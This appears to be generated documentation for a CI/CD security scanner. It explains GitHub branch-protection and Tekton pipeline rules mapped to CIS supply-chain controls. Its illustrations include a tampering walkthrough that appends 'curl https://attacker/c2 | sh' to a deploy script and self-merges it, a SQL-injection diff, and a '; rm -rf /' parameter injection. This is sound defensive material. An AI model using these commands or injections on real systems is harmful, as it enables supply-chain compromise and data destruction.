Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads required_pull_request_reviews.required_approving_review_count from the branch protection payload. Fires when the field is absent (no review requirement at all) or when the count is 0. SCM-001 covers the case where no protection rule exists; this rule scopes specifically to the review-count knob inside an existing rule.
Recommendation. In the default-branch protection rule, enable Require a pull request before merging and set the minimum approving review count to at least 1 (Scorecard's threshold for Branch-Protection's middle tier; raise to 2 for higher trust). Combine with Dismiss stale pull request approvals when new commits are pushed so a force-push doesn't carry an old approval forward.
Known false positives.
required_pull_request_reviews.bypass_pull_request_allowancesis covered bySCM-018: a protection rule that requires reviews but lists every contributor in the bypass allowlist still passes this rule even though the control is unenforced in practice. Read SCM-002 + SCM-018 as a pair when auditing whether required review actually fires.
Proof of exploit.
With protection but no required reviews, a maintainer can
self-approve a tampered change in two clicks:
git checkout -b release-fix
echo 'curl https://attacker/c2 | sh' >> deploy.sh
git commit -am 'fix: handle edge case'
git push origin release-fix
gh pr create --fill
gh pr merge --squash --auto # no second-set-of-eyes
# Release pipeline runs the tampered build with full
# production secrets in scope.
Setting required_approving_review_count to >= 1 forces
a separate identity to acknowledge the change before merge.
Source: SCM-002 in the SCM provider.
SCM-003: GitHub default code scanning is not enabled MEDIUM
Evidences: 1.1.7 Ensure any change to code is automatically scanned for risks (SAST).
How this is detected. Reads state from the default code-scanning setup endpoint (GET /repos/{owner}/{repo}/code-scanning/default-setup). Fires when state is anything other than configured (not-configured, missing, or 404). This check only evaluates the default-setup endpoint. Repos running hand-authored CodeQL workflows or third-party SARIF uploads can still fail SCM-003; suppress per repo via ignore-file when that alternative coverage is intentional.
Recommendation. Enable default code scanning under the repository's Settings -> Code security -> Code scanning -> Default. The GitHub-managed CodeQL setup picks the right languages automatically and writes findings into the Code Scanning UI on every push and PR. Teams that already ship a CodeQL workflow can leave this rule's check off — but the default setup is the lowest-friction path for repos that don't have one.
Known false positives.
- Repos that ship a hand-authored CodeQL workflow (or use Semgrep / Snyk / another SAST whose results land in the Code Scanning UI via SARIF upload) get the same coverage without enabling default setup. Suppress via ignore-file rather than removing the rule.
Proof of exploit.
Without code scanning, the only signal that a PR
introduces (e.g.) a SQL injection or hardcoded secret
comes from the human reviewer:
- def lookup(user_id):
- return db.query("SELECT * FROM u WHERE id = ?", user_id)
+ def lookup(user_id):
+ return db.query(f"SELECT * FROM u WHERE id = {user_id}")
A reviewer skimming a 400-line PR misses this. Default
CodeQL setup catches the same change as a CWE-89 finding
in the PR check, surfaces it inline in the diff, and
blocks the merge if the protection rule wires it up as
a required status check (see SCM-008).
Source: SCM-003 in the SCM provider.
SCM-004: GitHub secret scanning is not enabled HIGH
Evidences: 1.5.1 Ensure scanners are in place to identify and prevent sensitive data in code.
How this is detected. Reads security_and_analysis.secret_scanning.status from the repo metadata payload. Fires when the value is anything other than enabled. Public repos get secret scanning free since 2023; private repos require a GitHub Advanced Security license. Without secret scanning, a credential committed even briefly is recoverable from git history indefinitely.
Recommendation. Enable secret scanning under the repository's Settings -> Code security -> Secret scanning. The GitHub-managed scanner covers ~200 token patterns from major providers and runs on every push. Pair with push protection so secrets are blocked at commit time rather than caught after the fact.
Known false positives.
- When the scanning token lacks
adminscope on the repo, thesecurity_and_analysisblock is omitted from the API response and this rule cannot telldisabledfromunknown. The fix is to grant the token admin scope on the repo (or re-run with a personal token from a maintainer) rather than to suppress the rule.
Seen in the wild.
- GitGuardian's annual State of Secrets Sprawl reports find millions of fresh credential leaks per year across public GitHub commits, with the median time-to-revocation measured in days. Native secret scanning alerts the maintainer within minutes of the push, collapsing the exploitable window from days to minutes for the patterns it covers.
Source: SCM-004 in the SCM provider.
SCM-005: Dependabot security updates are not enabled MEDIUM
Evidences: 1.1.8 Ensure scanners are in place to identify and confirm presence of vulnerabilities (SCA).
How this is detected. Reads security_and_analysis.dependabot_security_updates.status from the repo metadata payload. Fires when the value is anything other than enabled. Without security updates, the team has to discover and triage CVEs against their dependency graph manually — a delay measured in days or weeks even on attentive teams, vs hours when the bot opens the PR for them.
Recommendation. Enable Dependabot security updates under the repository's Settings -> Code security -> Dependabot. The bot opens a PR with the minimum-required upgrade for each open advisory against an in-use dependency. Pair with version-update config (.github/dependabot.yml) so routine bumps don't rely on the security-update path.
Known false positives.
- When the scanning token lacks
adminscope on the repo, thesecurity_and_analysisblock is omitted from the API response and this rule cannot telldisabledfromunknown. Re-run with admin scope to confirm. - Repos that delegate dependency-update PRs to Renovate, Snyk, or another bot get equivalent coverage without Dependabot. Suppress via ignore-file rather than removing the rule.
Source: SCM-005 in the SCM provider.
SCM-006: Default branch protection does not require signed commits MEDIUM
Evidences: 1.1.6 Ensure any change to code is signed.
How this is detected. Reads required_signatures.enabled from the branch protection payload. Fires when the field is missing or False. Required signatures don't validate signature authenticity (the GitHub web UI does that lazily on render), but a missing signature is rejected at push time, which blocks the most common compromise pattern: a stolen personal access token used to push under the maintainer's name without their signing key.
Recommendation. In the default-branch protection rule, enable Require signed commits. Configure GPG, SSH, or S/MIME signatures for every contributor's git client (git config commit.gpgsign true plus an uploaded public key). Pair with branch protection's Restrict who can push to matching branches so only signed commits from authorized identities land on the default branch.
Source: SCM-006 in the SCM provider.
SCM-007: Default branch protection allows force-pushes HIGH
Evidences: 1.1.17 Ensure default branches' commits are protected from being deleted/rewritten.
How this is detected. Reads allow_force_pushes.enabled from the branch protection payload. Fires when the value is True. The complementary deletion-protection knob is covered by SCM-009; this rule focuses on the rewrite-history attack class because force-push is the primitive every post-incident rewrite uses to clean up after itself.
Recommendation. In the default-branch protection rule, set Allow force pushes to Disabled. Force-pushes overwrite the audit trail; an attacker who lands a malicious commit can erase evidence of it after the fact. Also set Allow deletions to Disabled so the branch itself can't be wiped.
Source: SCM-007 in the SCM provider.
SCM-008: Default branch protection does not require status checks MEDIUM
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators, 1.1.7 Ensure any change to code is automatically scanned for risks (SAST).
How this is detected. Reads required_status_checks.contexts (or the newer checks shape) from the branch protection payload. Fires when the field is missing or the contexts list is empty. Without required checks the merge gate degrades to human-only review; SCM-002 covers the review knob, this rule covers the automated-verification knob, and both should be on for high-trust default branches.
Recommendation. In the default-branch protection rule, enable Require status checks to pass before merging and list every check the team relies on (CI build, code scanning, secret scanning, lint). Set strict: true (Require branches to be up to date before merging) so a stale base doesn't land regressions the latest checks would catch.
Known false positives.
- The
restrictionsblock (users / teams / apps allowed to push directly to the protected branch) is not consulted today: a rule that requires status checks but lists every contributor in the push-restrictions allowlist still passes this rule even though those identities can land code without the checks running. Audit the allowlist in the GitHub UI when this rule passes on a high-trust repo. - Status-check names are matched as opaque strings; a configured required check that no workflow actually emits (typo, deleted job) will still pass this rule. The check would block the merge in practice (GitHub waits for the named context forever), but the misconfiguration itself isn't visible from the protection payload.
Source: SCM-008 in the SCM provider.
SCM-009: Default branch protection allows branch deletion HIGH
Evidences: 1.1.17 Ensure default branches' commits are protected from being deleted/rewritten.
How this is detected. Reads allow_deletions.enabled from the branch protection payload. Fires when the value is True. Pairs with SCM-007 (force-push allowed) — the two flags together cover the complete rewrite-history attack class.
Recommendation. In the default-branch protection rule, set Allow deletions to Disabled. A deleted default branch wipes every protection rule attached to it; an attacker with write access can delete the branch, recreate it from a tampered commit, and re-apply protection in a way that looks identical from the UI.
Source: SCM-009 in the SCM provider.
SCM-010: Branch protection allows administrators to bypass HIGH
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads enforce_admins.enabled from the branch protection payload. Fires when the value is False or the field is missing. Pairs with every other SCM-NNN rule that reads a branch-protection knob — without enforce_admins, those rules document intent rather than reality.
Recommendation. In the default-branch protection rule, enable Do not allow bypassing the above settings (a.k.a. Include administrators). Otherwise every other knob you set (required reviews, status checks, signed commits) becomes advisory rather than enforced. A compromised admin account is also a much shorter path to a tampered release than a compromised contributor account, so admins are exactly the identity the gate needs to apply to.
Source: SCM-010 in the SCM provider.
SCM-011: Default branch protection does not require CODEOWNERS reviews MEDIUM
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads required_pull_request_reviews.require_code_owner_reviews from the branch protection payload. Fires when the value is False or the field is missing. SCM-002 covers the bare review-count knob; this rule scopes specifically to whose review counts. The check evaluates only the protection-rule toggle; verifying that an actual CODEOWNERS file exists at .github/CODEOWNERS (and covers the right paths) is left to the recommendation, since the GitHub API surfaces the file's presence as a separate contents request the SCM provider does not fetch.
Recommendation. In the default-branch protection rule, enable Require review from Code Owners. Add a CODEOWNERS file at .github/CODEOWNERS (or docs/CODEOWNERS) mapping directories to the team or individual responsible. The GitHub UI auto-requests review from the matched owners on every PR that touches a covered path; combined with this branch-protection knob, the merge is blocked until they approve.
Known false positives.
- Single-team repos where every contributor is a code owner of every path don't need the routing CODEOWNERS provides — but the protection knob still helps when a new team member joins. Suppress via ignore-file when the team intentionally stays flat.
Source: SCM-011 in the SCM provider.
SCM-012: Default branch protection keeps stale reviews after a push MEDIUM
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads required_pull_request_reviews.dismiss_stale_reviews from the branch protection payload. Fires when the value is False or the field is missing. SCM-002 ensures a review is required at all; this rule ensures the approval the team relies on actually corresponds to the diff being merged.
Recommendation. In the default-branch protection rule, enable Dismiss stale pull request approvals when new commits are pushed. Approvals will be cleared every time the PR head moves; the reviewer has to re-approve the latest diff before merge, closing the time-of-check / time-of-use gap an attacker can exploit by amending the branch after approval.
Source: SCM-012 in the SCM provider.
SCM-013: Default branch protection does not require conversation resolution LOW
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads required_conversation_resolution.enabled from the branch protection payload. Fires when the value is False or the field is missing. Severity is LOW because the rule documents process discipline rather than a structural vulnerability — but unresolved security comments are a common upstream cause of incidents.
Recommendation. In the default-branch protection rule, enable Require conversation resolution before merging. PRs cannot land until every review comment is marked resolved. The friction is small (the PR author clicks Resolve after addressing) and the payoff is concrete: review comments can't be ignored to ship faster.
Source: SCM-013 in the SCM provider.
SCM-014: Default branch protection does not require approval of the most recent push MEDIUM
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads required_pull_request_reviews.require_last_push_approval from the branch protection payload. Fires when the value is False or the field is missing. Pairs with SCM-012 (dismiss stale reviews) — both close the same approval-time-of-check / merge-time-of-use gap from different angles.
Recommendation. In the default-branch protection rule, enable Require approval of the most recent reviewable push. The reviewer and the most recent pusher must be different identities; an attacker controlling one collaborator account can no longer ship a malicious diff under another collaborator's approval.
Source: SCM-014 in the SCM provider.
SCM-015: Secret scanning push protection is not enabled HIGH
Evidences: 1.5.1 Ensure scanners are in place to identify and prevent sensitive data in code.
How this is detected. Reads security_and_analysis.secret_scanning_push_protection.status from the repo metadata payload. Fires when the value is anything other than enabled. Strongly paired with SCM-004 (secret scanning enabled): SCM-004 catches credentials after the push, SCM-015 stops them at the push. Both should be on for high-trust repos.
Recommendation. Enable secret scanning push protection under the repository's Settings -> Code security -> Push protection. Pushes containing matched credential patterns are refused by GitHub before the commit is accepted, so the credential never enters git history. Authors get an immediate remediation prompt; the bypass-with-justification flow preserves the audit trail when a legitimate test-case credential needs to land.
Known false positives.
- When the scanning token lacks
adminscope on the repo, thesecurity_and_analysisblock is omitted from the API response and this rule cannot telldisabledfromunknown. Re-run with admin scope to confirm. - Push protection covers the GitHub-managed pattern set (~200 token patterns from major providers). Custom-pattern support requires GitHub Advanced Security on private repos; public repos get the GitHub-managed set free.
Source: SCM-015 in the SCM provider.
SCM-016: Private vulnerability reporting is not enabled LOW
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified.
How this is detected. Reads security_and_analysis.private_vulnerability_reporting.status from the repo metadata payload. Fires when the value is anything other than enabled. Severity is LOW because the rule documents process readiness rather than a structural vulnerability — but having no private reporting channel means the next external researcher's report is either a public issue or nothing.
Recommendation. Enable private vulnerability reporting under the repository's Settings -> Code security -> Private vulnerability reporting. Researchers get a private Security tab where they can submit details directly to maintainers; the maintainers can then triage, request a CVE, coordinate disclosure timing, and merge a fix without exposing the bug publicly until ready.
Known false positives.
- When the scanning token lacks
adminscope on the repo, thesecurity_and_analysisblock is omitted from the API response and this rule cannot telldisabledfromunknown. Re-run with admin scope to confirm. - Repos that publish a SECURITY.md with an alternative out-of-band reporting channel (security@ mailbox, HackerOne / Bugcrowd program) cover the same control via a different mechanism. Suppress via ignore-file when the alternative is in place and documented.
Source: SCM-016 in the SCM provider.
SCM-017: Repository has no CODEOWNERS file MEDIUM
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Probes the three canonical CODEOWNERS locations via GET /repos/{owner}/{repo}/contents/<path>. Fires when none of the three returns a file response. Pairs with SCM-011 (the protection-rule toggle): SCM-011 covers intent, SCM-017 covers reality. A repo with both set is auditing the path-scoped review actually happens.
Recommendation. Add a CODEOWNERS file at .github/CODEOWNERS (the GitHub-recommended location), CODEOWNERS at the repo root, or docs/CODEOWNERS. Map directories to the team or individual responsible for them. With SCM-011's require_code_owner_reviews knob enabled, GitHub auto-requests review from the matched owners on every PR; without the file, the toggle is meaningless and any reviewer can approve any change.
Known false positives.
- Single-team repos where every contributor is a code owner of every path may legitimately skip CODEOWNERS — the file adds no routing in that case. Suppress via ignore-file when the team intentionally stays flat. The same suppression applies to SCM-011.
Source: SCM-017 in the SCM provider.
SCM-018: Required PR reviews can be bypassed by named identities MEDIUM
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads required_pull_request_reviews.bypass_pull_request_allowances from the branch protection payload. Fires when any of users / teams / apps is non-empty. Surfaces the counts so the operator can locate the bypass entries in the GitHub UI without re-running the audit manually.
Recommendation. In the default-branch protection rule, clear Allow specified actors to bypass required pull requests (required_pull_request_reviews.bypass_pull_request_allowances in the API). Required reviews are only as strong as the bypass list. If a release-bot account needs to merge automated PRs, prefer a separate protection rule for the bot's branch namespace rather than a bypass entry on the default branch.
Seen in the wild.
- Multiple GitHub Security Lab writeups attribute post-incident review-control gaps to legacy bypass entries: a contractor onboarded years earlier is listed in the allowance, a compromise of that contractor account merges tampered code despite the team having added required reviews on the default branch.
Source: SCM-018 in the SCM provider.
SCM-019: Push restrictions allowlist names individual users LOW
Evidences: 1.1.17 Ensure default branches' commits are protected from being deleted/rewritten.
How this is detected. Reads restrictions.users from the branch protection payload. Fires when the list is non-empty. restrictions itself being absent is the default GitHub posture (no push allowlist; review gates govern access) and passes this rule. Teams and apps in restrictions are not flagged — the rule audits the personal-account subset specifically.
Recommendation. In the default-branch protection rule, audit the Restrict who can push to matching branches allowlist (restrictions in the API). Move each individual user into a GitHub team and add the team instead, or replace with a GitHub App / bot service account when the entry is an automation. Named user entries are personal-compromise vectors that bypass every PR-review gate on the branch.
Known false positives.
- A break-glass admin account intentionally listed for incident response is a legitimate use case. Suppress via ignore-file once the account's access has been reviewed (MFA, hardware token, audit-logged use).
Source: SCM-019 in the SCM provider.
TKN-001: Tekton step image not pinned to a digest HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Applies to Task and ClusterTask kinds. The image must contain @sha256: followed by a 64-char hex digest. Any tag-only reference, including :latest, fails.
Recommendation. Pin every step image to a content-addressable digest (gcr.io/tekton-releases/git-init@sha256:<digest>). Tag-only references (alpine:3.18) and rolling tags (alpine:latest) let a compromised registry update redirect the step at the next pull, with no audit trail in the Task manifest.
Source: TKN-001 in the Tekton provider.
TKN-002: Tekton step runs privileged or as root HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Detection fires on a step with securityContext.privileged: true, securityContext.runAsUser: 0, securityContext.runAsNonRoot: false, securityContext.allowPrivilegeEscalation: true, or no securityContext block at all.
Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every step. A privileged step shares the node's kernel namespaces; a malicious or compromised step image then has root on the build node, breaking the boundary between build and cluster.
Source: TKN-002 in the Tekton provider.
TKN-003: Tekton param interpolated unsafely in step script CRITICAL
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. Fires on any $(params.X) or $(workspaces.X.path) token inside a script: body that isn't already wrapped in double quotes ("$(params.X)"). Doesn't fire on the env-var indirection pattern, which is safe.
Recommendation. Don't interpolate $(params.<name>) directly into the step script:. Tekton substitutes the value before the shell parses it, so a parameter containing ; rm -rf / runs as shell. Receive the parameter through env: (valueFrom: ... or value: $(params.<name>)) and reference the env var quoted in the script ("$NAME"); or pass it as a positional argument to a shell function.
Source: TKN-003 in the Tekton provider.
TKN-004: Tekton Task mounts hostPath or shares host namespaces CRITICAL
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Checks spec.volumes[].hostPath (legacy v1beta1 form), spec.workspaces[].volumeClaimTemplate.spec.storageClassName == 'hostpath', and spec.podTemplate host-namespace flags.
Recommendation. Use Tekton workspaces: backed by emptyDir or persistentVolumeClaim instead of hostPath. Drop hostNetwork: true / hostPID: true / hostIPC: true on the Task's podTemplate. A hostPath mount of /var/run/docker.sock or / lets the build break out of the pod and act as the underlying node.
Source: TKN-004 in the Tekton provider.
TKN-005: Literal secret value in Tekton step env or param default CRITICAL 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Strong matches: AWS access keys, GitHub PATs, JWTs. Weak match: env var name suggests a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) and the value is a non-empty literal rather than a $(params.X) / valueFrom reference.
Recommendation. Mount secrets via env.valueFrom.secretKeyRef (or a volumes: Secret mount) instead of writing the value into env.value or params[].default. Task manifests are committed to git and cluster-readable; literal values leak through normal access paths.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: TKN-005 in the Tekton provider.
TKN-006: Tekton run lacks an explicit timeout LOW
Evidences: 2.2.2 Ensure build workers are single-use.
How this is detected. Applies to PipelineRun, TaskRun, and Pipeline. For Pipelines, the rule looks for spec.tasks[].timeout as evidence of intent. Task / ClusterTask themselves don't carry a timeout, the timeout lives on the concrete run.
Recommendation. Set spec.timeouts.pipeline (or spec.timeout on a TaskRun) on every PipelineRun and TaskRun. A misbehaving step otherwise pins a build pod for the cluster's default timeout (1h). For long jobs, set a generous explicit value (2h, 6h) rather than leaving it implicit.
Source: TKN-006 in the Tekton provider.
TKN-007: Tekton run uses the default ServiceAccount MEDIUM
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. An explicit serviceAccountName: default setting is treated the same as omission.
Recommendation. Set spec.serviceAccountName on every TaskRun and PipelineRun to a least-privilege ServiceAccount that carries only the secrets and RBAC the run actually needs. Falling back to the namespace's default SA grants access to whatever cluster-admin or wildcard role someone later binds to default, a privilege-escalation surface that should never be load-bearing for build pods.
Source: TKN-007 in the Tekton provider.
TKN-008: Tekton step script pipes remote install or disables TLS HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Uses the cross-provider CURL_PIPE_RE and TLS_BYPASS_RE regexes so detection is consistent with the GHA / GitLab / CircleCI / Cloud Build providers.
Recommendation. Replace curl ... | sh with a download-then-verify-then-execute pattern. Drop TLS-bypass flags (curl -k, git config http.sslverify false); install the missing CA into the step image instead. Both forms let an attacker controlling DNS / a transparent proxy substitute the script the step runs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: TKN-008 in the Tekton provider.
TKN-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Detection mirrors GHA-006 / BK-009 / CC-006, the shared signing-token catalog (cosign, sigstore, slsa-github-generator, slsa-framework, notation-sign) is searched across every string in the Task / Pipeline document. The rule only fires on artifact-producing Tasks (those that invoke docker build / docker push / buildah / kaniko / helm upgrade / aws s3 sync / etc.) so lint-only Tasks don't trip it.
Recommendation. Add a signing step to the Task, either a dedicated cosign sign step after the build, or use the official cosign Tekton catalog Task as a referenced step. The Task should sign by digest (cosign sign --yes <repo>@sha256:<digest>) so a re-pushed tag can't bypass the signature.
Source: TKN-009 in the Tekton provider.
TKN-010: No SBOM generated for build artifacts MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool. Fires only on artifact-producing Tasks.
Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > $(workspaces.output.path)/sbom.json runs in the official syft Tekton catalog Task. cyclonedx-cli and cdxgen are alternatives. Publish the SBOM as a Workspace result so downstream Tasks can consume it.
Source: TKN-010 in the Tekton provider.
TKN-011: No SLSA provenance attestation produced MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked), 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Tekton Chains is the Tekton-native answer, once enabled on the cluster, every TaskRun's outputs are signed and attested without per-Task wiring. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance, witness run). Tasks produced by tekton-chains pass on the cosign attest match.
Recommendation. After the build step, run cosign attest --predicate slsa.json --type slsaprovenance <ref> (or use the tekton-chains controller, which signs and attests every TaskRun automatically when configured). Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: TKN-011 in the Tekton provider.
TKN-012: No vulnerability scanning step MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, osv-scanner, govulncheck, anchore, codeql-action, semgrep, bandit, checkov, tfsec, dependency-check. Walks every Task / Pipeline / *Run document; passes if any document includes a scanner reference.
Recommendation. Add a vulnerability scanner step. trivy fs $(workspaces.src.path) for source / filesystem; trivy image <ref> for container images. The official Tekton catalog ships trivy-scanner and grype-scanner Tasks if you'd rather reference one. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: TKN-012 in the Tekton provider.
This page is generated. Edit pipeline_check/core/standards/data/cis_supply_chain.py (mappings) or scripts/gen_standards_docs.py (intro / per-control prose) and run python scripts/gen_standards_docs.py cis_supply_chain.